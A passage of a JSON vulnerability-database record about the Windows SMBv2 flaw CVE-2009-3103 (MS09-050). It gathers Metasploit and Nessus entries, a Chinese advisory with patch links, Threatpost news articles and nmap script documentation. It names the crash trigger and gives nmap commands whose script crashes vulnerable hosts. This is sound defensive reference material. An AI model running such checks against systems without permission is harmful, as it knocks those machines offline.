"2016-12-05T22:13:35"}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_FUNC_INDEX", "type": "metasploit", "title": "MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.", "published": "2010-02-26T13:42:17", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2009-3103"], "lastseen": "2018-04-11T14:21:48"}, {"id": "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_NEGOTIATE_PIDHIGH", "type": "metasploit", "title": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", "description": "This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.", "published": "2010-04-15T16:08:27", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-11-07T01:42:07"}, {"id": "MSF:AUXILIARY/DOS/WINDOWS/SMB/MS09_050_SMB2_SESSION_LOGOFF", "type": "metasploit", "title": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference", "description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.", "published": "2010-04-15T16:08:27", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-11-19T13:43:41"}], "seebug": [{"id": "SSV:12474", "type": "seebug", "title": "Microsoft Windows SMBv2\u534f\u5546\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(MS09-050)", "description": "Bugraq ID: 36299\r\nCVE ID\uff1aCVE-2009-3103\r\n\r\nMicrosoft windows\u662f\u4e00\u6b3e\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nMicrosoft windows SMB2\u662f\u65b0\u7248windows\u6346\u7ed1\u7684SMB\u534f\u8bae\u5b9e\u73b0\uff0cSRV2.SYS\u9a71\u52a8\u4e0d\u6b63\u786e\u5904\u7406\u53d1\u9001\u7ed9NEGOTIATE PROTOCOL REQUEST\u529f\u80fd\u7684\u7578\u5f62SMB\u5934\u5b57\u6bb5\u6570\u636e\uff0cNEGOTIATE PROTOCOL REQUEST\u662f\u5ba2\u6237\u7aef\u53d1\u9001\u7ed9SMB\u670d\u52a1\u5668\u7684\u7b2c\u4e00\u4e2aSMB\u67e5\u8be2\uff0c\u7528\u4e8e\u8bc6\u522bSMB\u8bed\u8a00\u5e76\u7528\u4e8e\u4e4b\u540e\u7684\u901a\u4fe1\u3002\r\n\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u6784\u5efaProcess Id High\u5934\u5b57\u6bb5\u4e2d\u5305\u542b\u6709\u201c&\u201d\u5b57\u7b26\u7684SMB\u62a5\u6587\u5e76\u53d1\u9001\u7ed9\u53d7\u5f71\u54cd\u7cfb\u7edf\uff0c\u53ef\u5bfc\u81f4\u7cfb\u7edf\u84dd\u5c4f\u6b7b\u673a\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\u6b64\u6f0f\u6d1e\u65e0\u9700\u9a8c\u8bc1\u4ea4\u4e92\u3002\n\nMicrosoft Windows Vista x64 Edition SP2\r\nMicrosoft Windows Vista x64 Edition SP1\r\nMicrosoft Windows Vista x64 Edition 0\r\nMicrosoft Windows Vista Ultimate 64-bit edition SP2\r\nMicrosoft Windows Vista Ultimate 64-bit edition SP1\r\nMicrosoft Windows Vista Ultimate 64-bit edition 0\r\nMicrosoft Windows Vista Home Premium 64-bit edition SP2\r\nMicrosoft Windows Vista Home Premium 64-bit edition SP1\r\nMicrosoft Windows Vista Home Premium 64-bit edition 0\r\nMicrosoft Windows Vista Home Basic 64-bit edition SP2\r\nMicrosoft Windows Vista Home Basic 64-bit edition SP1\r\nMicrosoft Windows Vista Home Basic 64-bit edition 0\r\nMicrosoft Windows Vista Enterprise 64-bit edition SP2\r\nMicrosoft Windows Vista Enterprise 64-bit edition SP1\r\nMicrosoft Windows Vista Enterprise 64-bit edition 0\r\nMicrosoft Windows Vista Business 64-bit edition SP2\r\nMicrosoft Windows Vista Business 64-bit edition SP1\r\nMicrosoft Windows Vista Business 64-bit edition 0\r\nMicrosoft Windows Vista Ultimate SP2\r\nMicrosoft Windows Vista Ultimate SP1\r\nMicrosoft Windows Vista Ultimate\r\nMicrosoft Windows Vista Home Premium SP2\r\nMicrosoft Windows Vista Home Premium SP1\r\nMicrosoft Windows Vista Home Premium\r\nMicrosoft Windows Vista Home Basic SP2\r\nMicrosoft Windows Vista Home Basic SP1\r\nMicrosoft Windows Vista Home Basic\r\nMicrosoft Windows Vista Enterprise SP2\r\nMicrosoft Windows Vista Enterprise SP1\r\nMicrosoft Windows Vista Enterprise\r\nMicrosoft Windows Vista Business SP2\r\nMicrosoft Windows Vista Business SP1\r\nMicrosoft Windows Vista Business\r\nMicrosoft Windows Server 2008 Standard Edition SP2\r\nMicrosoft Windows Server 2008 Standard Edition 0\r\nMicrosoft Windows Server 2008 for x64-based Systems SP2\r\nMicrosoft Windows Server 2008 for x64-based Systems 0\r\nMicrosoft Windows Server 2008 for Itanium-based Systems SP2\r\nMicrosoft Windows Server 2008 for Itanium-based Systems 0\r\nMicrosoft Windows Server 2008 for 32-bit Systems SP2\r\nMicrosoft Windows Server 2008 for 32-bit Systems 0\r\nMicrosoft Windows Server 2008 Enterprise Edition SP2\r\nMicrosoft Windows Server 2008 Enterprise Edition 0\r\nMicrosoft Windows Server 2008 Datacenter Edition SP2\r\nMicrosoft Windows Server 2008 Datacenter Edition 0\r\nMicrosoft Windows 7 RC\r\nMicrosoft Windows 7 beta\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u4f9b\u5e94\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\uff1a\r\nMicrosoft Windows Server 2008 for x64-based Systems 0\r\nMicrosoft Security Update for Windows Server 2008 x64 Edition (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=aff6f9c7-4a72 -48f2-b750-204d796c7daa\r\nMicrosoft Windows Server 2008 for Itanium-based Systems SP2\r\nMicrosoft Security Update for Windows Server 2008 for Itanium-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=7b70108b-7f59 -4898-ab4e-76be990de878\r\nMicrosoft Windows Server 2008 for 32-bit Systems SP2\r\nMicrosoft Security Update for Windows Server 2008 (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=ff6bfcf3-76c9 -4c45-b57d-22f94458dd6e\r\nMicrosoft Windows Vista x64 Edition 0\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=62ed5d0a-5ca6 -4942-80c9-7808b14cb6b5\r\nMicrosoft Windows Server 2008 for x64-based Systems SP2\r\nMicrosoft Security Update for Windows Server 2008 x64 Edition (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=aff6f9c7-4a72 -48f2-b750-204d796c7daa\r\nMicrosoft Windows Server 2008 for Itanium-based Systems 0\r\nMicrosoft Security Update for Windows Server 2008 for Itanium-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=7b70108b-7f59 -4898-ab4e-76be990de878\r\nMicrosoft Windows Vista x64 Edition SP2\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=62ed5d0a-5ca6 -4942-80c9-7808b14cb6b5\r\nMicrosoft Windows Server 2008 for 32-bit Systems 0\r\nMicrosoft Security Update for Windows Server 2008 (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=ff6bfcf3-76c9 -4c45-b57d-22f94458dd6e\r\nMicrosoft Windows Vista x64 Edition SP1\r\nMicrosoft Security Update for Windows Vista for x64-based Systems (KB975517)\r\nhttp://www.microsoft.com/downloads/details.aspx?familyid=62ed5d0a-5ca6 -4942-80c9-7808b14cb6b5", "published": "2009-10-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-12474", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-11-19T18:34:10"}], "threatpost": [{"id": "MICROSOFT-CONFIRMS-SMB2-FLAW-HEIGHTENS-SEVERITY-091109/72229", "type": "threatpost", "title": "Microsoft Confirms SMB2 Flaw, Heightens Severity", "description": "[](<https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/>)\n\nMicrosoft has issued a formal security advisory to confirm the [remote reboot flaw in its implementation of the SMB2 protocol](<https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/>), going a step further to warn that a successful attack could lead to remote code execution and full system takeover.\n\n### Related Posts\n\n#### [EFF Blasts Microsoft Over \u2018Malicious\u2019 Windows 10 Rollout Tactics](<https://threatpost.com/eff-blasts-microsoft-over-malicious-windows-10-rollout-tactics/120006/> \"Permalink to EFF Blasts Microsoft Over \u2018Malicious\u2019 Windows 10 Rollout Tactics\" )\n\nAugust 18, 2016 , 4:38 pm\n\n#### [Latest Windows UAC Bypass Permits Code Execution](<https://threatpost.com/latest-windows-uac-bypass-permits-code-execution/119887/> \"Permalink to Latest Windows UAC Bypass Permits Code Execution\" )\n\nAugust 15, 2016 , 3:35 pm\n\n#### [Microsoft Mistakenly Leaks Secure Boot Key](<https://threatpost.com/microsoft-mistakenly-leaks-secure-boot-key/119828/> \"Permalink to Microsoft Mistakenly Leaks Secure Boot Key\" )\n\nAugust 11, 2016 , 11:31 am\n\nThe vulnerability, which was originally released as a denial-of-service issue, does not affect the RTM version of Windows 7, Microsoft said. It appears [Microsoft fixed the flaw](<http://twitter.com/jness/statuses/3856921104>) in Windows 7 build ~7130, just after RC1. Windows Vista and Windows Server 2003 users remain at risk.\n\nThe Microsoft [advisory](<http://www.microsoft.com/technet/security/advisory/975497.mspx>) is somewhat confusing. It mentions the plural \u201cvulnerabilities\u201d in the title but later warns of \u201ca possible vulnerability in Microsoft Server Message Block (SMB) implementation.\u201d[ \n](<http://blogs.zdnet.com/security/?p=4222> \"Permanent Link to Windows 7, Vista exposed to 'teardrop attack'\" )\n\nIt is, however, very clear about the risk severity:\n\nAn attacker who successfully exploited this vulnerability could take complete control of an affected system. Most attempts to exploit this vulnerability will cause an affected system to stop responding and restart.[ \n](<http://blogs.zdnet.com/security/?p=4217> \"Permanent Link to Microsoft patches gaping Windows worm holes\" )\n\nMicrosoft points to [this CVE entry](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103>) to explain the actual bug:\n\nArray index error in the SMB2 protocol implementation in srv2.sys in Microsoft Windows 7, Server 2008, and Vista Gold, SP1, and SP2 allows remote attackers to cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location.\n\nProof of concept code, which allows an attacker to remotely crash any vulnerable machine with SMB enabled, is publicly available.\n\nIn the absence of patch, Microsoft recommends that users disable SMB v2 and block TCP ports 139 and 445 at the firewall.", "published": "2009-09-11T12:12:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/microsoft-confirms-smb2-flaw-heightens-severity-091109/72229/", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-09-04T20:48:48"}, {"id": "MICROSOFT-SHIPS-TEMPORARY-FIX-IT-CRITICAL-VISTA-FLAW-092309/72219", "type": "threatpost", "title": "Microsoft Ships Temporary Fix-It for Critical Vista Flaw", "description": "[](<https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/>)\n\nWith [exploit code in circulation](<https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/>) and facing a race against time to fix the SMB v2 vulnerability haunting Windows Vista and Windows Server 2008, Microsoft today shipped a one-click \u201cfix-it\u201d workaround to help users avoid malicious hacker attacks.\n\n### Related Posts\n\n#### [AutoRun Infections Plummet Following Upgrade](<https://threatpost.com/autorun-infections-plummet-following-upgrade-061511/75336/> \"Permalink to AutoRun Infections Plummet Following Upgrade\" )\n\nJune 15, 2011 , 4:00 pm\n\n#### [Microsoft Warns Of Security Hole in Windows Graphics Engine](<https://threatpost.com/microsoft-warns-security-hole-windows-graphics-engine-010411/74820/> \"Permalink to Microsoft Warns Of Security Hole in Windows Graphics Engine\" )\n\nJanuary 4, 2011 , 7:52 pm\n\n#### [Microsoft Ships Anti-Exploit Tool for IT Admins](<https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/74268/> \"Permalink to Microsoft Ships Anti-Exploit Tool for IT Admins\" )\n\nJuly 28, 2010 , 6:54 pm\n\nThe fix-it package, which was added to Redmond\u2019s pre-patch [advisory](<http://www.microsoft.com/technet/security/advisory/975497.mspx>), effectively disables SMBv2 and then stops and starts the Server service. It provides temporary mitigation from remote code execution attacks targeting the known \u2014 and still unpatched \u2014 vulnerability.[ \n](<http://blogs.zdnet.com/security/?p=4350> \"Permanent Link to Remote exploit released for Windows Vista SMB2 worm hole\" )\n\nMicrosoft cautioned that disabling SMBv2 may slow down SMB connections between Windows Vista and Windows Server 2008 machines.\n\nThe company also [confirmed](<http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx>) that the exploit code released into Immunity\u2019s Canvas pen-testing platform works as advertised:\n\n_We have analyzed the code ourselves and can confirm that it works reliably against 32-bit Windows Vista and Windows Server 2008 systems. The exploit gains complete control of the targeted system and can be launched by an unauthenticated user._\n\n_The exploit can be detected by intrusion detection systems (IDS) and firewalls that have signatures for the vulnerability being targeted (CVE-2009-3103)._\n\n_This exploit code from Immunity is only available to a small group of companies and organizations who will use it to determine the risk to their own networks and systems, or those of their customers. (We are aware that other groups are actively working on exploit code which is likely to be made public when it is completed)._\n\nIf reliable exploit code is released to the general public \u2014 [a strong likelihood](<http://metasploit.com>) \u2013it\u2019s only a matter of time before malicious hacker attacks surface in the wild. In the meantime, it\u2019s incumbent on Microsoft to ship an out-of-band patch as soon as possible.** \n**\n\nMicrosoft\u2019s Jonathan Ness hinted that an emergency patch may be forthcoming but it depends entirely on how soon the patch can pass quality assurance testing:\n\n_[We\u2019re] not slowing down our investigation, and are working on an update that can be delivered for all customers. The product team has built packages and are hard-at-work testing now to ensure quality. It takes more testing than you might think to release a quality update. For this update, the product team has so far already completed over 10,000 separate test cases in their regression testing. They are now in stress testing, 3rd-party application testing, and fuzzing. We\u2019d sure like to complete all that testing before the update needs to be released. We are keeping a close eye on the changing landscape and balancing this against the remaining test actions to determine the best ship schedule to bring a quality update to customers._\n\nIn the absence of a patch, here\u2019s what you can do:\n\n * [Click Here To Disable SMBv2](<http://go.microsoft.com/?linkid=9683379>)\n\nTo revert the workaround, and re-enable SMBv2, you can:\n\n * [Click Here To Re-Enable SMBv2](<http://go.microsoft.com/?linkid=9685006>)\n\nMitigation guidance for enterprises are available in [this blog post](<http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx>) and in the [Microsoft security advisory](<http://www.microsoft.com/technet/security/advisory/975497.mspx>).", "published": "2009-09-23T22:39:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/microsoft-ships-temporary-fix-it-critical-vista-flaw-092309/72219/", "cvelist": ["CVE-2009-3103"], "lastseen": "2016-09-04T20:52:53"}], "nmap": [{"id": "NMAP:SMB-VULN-CVE2009-3103.NSE", "type": "nmap", "title": "smb-vuln-cve2009-3103 NSE Script", "description": "Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable. \n\nThe script performs a denial-of-service against the vulnerability disclosed in CVE-2009-3103. This works against Windows Vista and some versions of Windows 7, and causes a bluescreen if successful. The proof-of-concept code at http://seclists.org/fulldisclosure/2009/Sep/39 was used, with one small change. \n\nThis check was previously part of smb-check-vulns.\n\n## Script Arguments \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script smb-vuln-cve2009-3103.nse -p445 <host>\n nmap -sU --script smb-vuln-cve2009-3103.nse -p U:137,T:139 <host>\n \n\n## Script Output \n \n \n Host script results:\n | smb-vuln-cve2009-3103:\n | VULNERABLE:\n | SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)\n | State: VULNERABLE\n | IDs: CVE:CVE-2009-3103\n | Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,\n | Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a\n | denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE\n | PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,\n | aka \"SMBv2 Negotiation Vulnerability.\" NOTE: some of these details are obtained from third party information.\n |\n | Disclosure date: 2009-09-08\n | References:\n | http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103\n |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103\n \n\n## Requires \n\n * nmap\n * smb\n * stdnse\n * table\n * vulns\n\n* * *\n", "published": "2015-10-03T06:07:49", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://nmap.org/nsedoc/scripts/smb-vuln-cve2009-3103.html", "cvelist": ["CVE-2009-3103"], "lastseen": "2017-08-15T15:15:46"}], "nessus": [{"id": "SMB2_PID_HIGH_VULN.NASL", "type": "nessus", "title": "MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (EDUCATEDSCHOLAR) (uncredentialed check)", "description": "The remote host is running a version of Microsoft Windows Vista or Windows Server 2008 that contains a vulnerability in its SMBv2 implementation. An attacker can exploit this flaw to disable the remote host or to execute arbitrary code on it.\n\nEDUCATEDSCHOLAR is one of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers.", "published": "2009-09-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40887", "cvelist": ["CVE-2009-2532", "CVE-2009-3103"], "lastseen": "2017-10-29T13:35:39"}, {"id": "SMB_NT_MS09-050.NASL", "type": "nessus", "title": "MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517) (EDUCATEDSCHOLAR)", "description": "The remote Windows host contains a vulnerable SMBv2 implementation with the following issues :\n\n - A specially crafted SMBv2 packet can cause an infinite loop in the Server service. A remote, unauthenticated attacker can exploit this to cause a denial of service. (CVE-2009-2526)\n\n - Sending a specially crafted SMBv2 packet to the Server service can result in code execution. A remote, unauthenticated attacker can exploit this to take complete control of the system. (CVE-2009-2532, CVE-2009-3103) (EDUCATEDSCHOLAR)\n\nEDUCATEDSCHOLAR is one of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers.", "published": "2009-10-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=42106", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "lastseen": "2017-10-29T13:39:39"}], "zdt": [{"id": "1337DAY-ID-25384", "type": "zdt", "title": "Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) Exploit", "description": "Exploit for windows platform in category remote exploits", "published": "2016-02-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://0day.today/exploit/description/25384", "cvelist": ["CVE-2009-2532", "CVE-2009-2526", "CVE-2009-3103"], "lastseen": "2018-02-20T05:22:09"}]}}